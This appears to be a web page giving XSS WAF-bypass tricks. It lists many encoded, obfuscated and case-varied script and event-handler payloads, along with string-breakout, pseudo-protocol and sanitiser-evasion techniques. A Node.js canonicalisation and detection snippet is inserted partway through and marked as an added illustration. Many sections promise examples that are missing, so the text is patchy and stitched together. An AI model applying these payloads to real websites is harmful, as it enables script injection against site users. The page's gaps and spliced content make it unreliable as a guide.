🔭XSS WAF Bypass Trick

Basic Modification

The normal payload is <script>alert(1)</script>. If the WAF blocks the <script>, alert or </script> tokens, try these variants instead.

<script >alert(1)</script>
<script>window['al'+'ert']()</script>
<script>top[`alert`]()</script>
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
<img src=x onerror="js:abc='al'+'ert(1)';eval(abc)" />
<script>window[['a','l','e','r','t'].toString().replaceAll(',',"")]()</script>
<script>window[['conf','irm'].toString().replaceAll(',',"")]()</script>
<script>abc='\x61\x6C\x65\x72\x74';this[abc]()</script>
<script>window['\x61\x6C\x65\x72\x74']()</script>
<script>window[['\x61\x6C\x65\x72\x74'].toString().replaceAll(",","")]()</script>
<script>abc='aLerT()';eval(abc.toLowerCase())</script>
<script>abc='YWxlcnQoKQ==';eval(atob(abc))</script>
<script>abc='CoNFirM()';eval(abc.toLowerCase())</script>

Try inserting random whitespace to bypass the WAF.

Try inserting random HTML-encoded values inside the script tag.
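As an added illustration (not part of the original page), the Node.js snippet below shows why these variants defeat a naive keyword filter: a WAF has to canonicalise the value (URL-decode, drop null bytes, decode entities and hex escapes, collapse string concatenation, decode base64 literals, case-fold) before it matches anything. The rule names, the normalise/classify helpers and the sample list are constructed for this example.

```javascript
// Added example (not from the original page): canonicalise a request value the
// way a WAF must before keyword matching, then run a tiny rule set over samples
// constructed from the variants listed above. Rule names are our own choice.
// Requires Node.js (uses Buffer for base64 decoding).

function normalise(raw) {
  let s = raw;
  try { s = decodeURIComponent(s); } catch (e) { /* malformed %-encoding: keep raw */ }
  s = s.replace(/\0/g, '');                                          // <%00script>, al%00ert
  s = s.replace(/&#(\d+);?/g, (_, n) => String.fromCharCode(parseInt(n, 10)));      // &#9 &#10 &#13
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16))); // '\x61' -> a
  s = s.replace(/['"`]\s*[+,]\s*['"`]/g, '');                        // 'al'+'ert', ['a','l','e','r','t']
  s = s.replace(/(['"`])([A-Za-z0-9+\/]{8,}={0,2})\1/g, (m, q, b) => { // base64 literal fed to atob()
    const d = Buffer.from(b, 'base64').toString('utf8');
    return /^[\x20-\x7e]+$/.test(d) ? q + d + q : m;
  });
  s = s.replace(/<\s*([a-z]+)/gi, '<$1');                            // "< script"
  return s.toLowerCase();
}

const RULES = [
  ['script-tag',    /<script/],
  ['event-handler', /\bon[a-z]+\s*=/],
  ['js-sink',       /\b(alert|confirm|prompt|eval)\s*\(/],
];

// Names of every rule the canonical form triggers; [] means no rule matched.
function classify(raw) {
  const n = normalise(raw);
  return RULES.filter(([, re]) => re.test(n)).map(([name]) => name);
}

// Constructed samples, copied from the variant list on this page.
const SAMPLES = [
  '<script >alert(1)</script>',
  "<script>window['al'+'ert']()</script>",
  '<script&#9>alert(1)</script>',
  '<ScRipT>alert(1)</sCriPt>',
  '<%00script>al%00ert(1)</script>',
  '<img src=x onerror="js:abc=\'al\'+\'ert(1)\';eval(abc)" />',
  "<script>window['\\x61\\x6C\\x65\\x72\\x74']()</script>",
  "<script>abc='YWxlcnQoKQ==';eval(atob(abc))</script>",
];
```

Canonicalisation narrows the gap but never covers every encoding a browser accepts, so it complements contextual output encoding on the application side rather than replacing it.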

Attributes and Tags

You can try this payload to fool the website: because it contains <> (an empty closing tag), the website's parsing terminates there, as if the value were empty.

Try writing XSS test code:

Try writing any random tag at starting:

Try replacing the space, or inserting HTML-encoded values, between tags.

Try inserting a null byte (%00) at different positions.

A null byte can also work inside attribute names and values.

Event Handlers

An event handler runs JavaScript when a user interacts with a page element, for example by clicking a button.

Try these alternatives instead of onsubmit (if it doesn’t work):

These alternatives can also be used if the page is HTML5.

Delimiters & Brackets

A delimiter is one or more characters used to separate text.

Try using single and double quotes.

Try using encoded values to bypass the filter.

Try using a backtick (grave accent) as the delimiter:

<img onerror=`alert(1)`src=x>

Encoded values can also be used in between.

Try using the ` (grave accent) character.

As with delimiters, brackets can also help bypass website or page filters.

Extra brackets can trick the system, and a double slash (//) comments out the extra bracket before the closing tag.

An open bracket at the end can also help bypass the filter.

Try using different brackets.

Try using different characters.

Pseudo Protocols

A hyperlink takes the user from one page to another with a single click; its URL is where a pseudo-protocol can be placed.

Try injecting JavaScript code through the link to test for XSS.

Other attributes that take a URL as their value can also be used.

Existing JavaScript & Character Escaping

Try defining a variable and injecting the payload '; alert(1); //

The script still works, and the double slash comments out the rest of the line, so the system does not filter it.

An escape character can also be helpful:

<script>var a = '\\'; alert(1); //

Using Unicode characters like this can also help.

Dynamic String Construction & eval()

JavaScript contains a function called eval() that executes a string as code; the example here evaluates to 2.

Unicode encoding can also be used.

If the function is blocked, spelling the payload out of individual characters can still work: String.fromCharCode() can be used in lieu of eval().

Meta Refresh & File Renaming

A web browser can automatically refresh the current page after a certain period (meta refresh).

Try renaming the script source so it looks like an image file:

<script src="payload.jpg">

Sanitization & Length Limits

Try adding multiple tags (sometimes the application removes only the first instance of the script tag).

Any tag can be placed first so that it is the instance the application filters out. If the page rejects the payload because of a length limit, then:

Text between /* and */ is ignored, so the browser ultimately processes the pieces of our payload as if they had been injected in only one location.
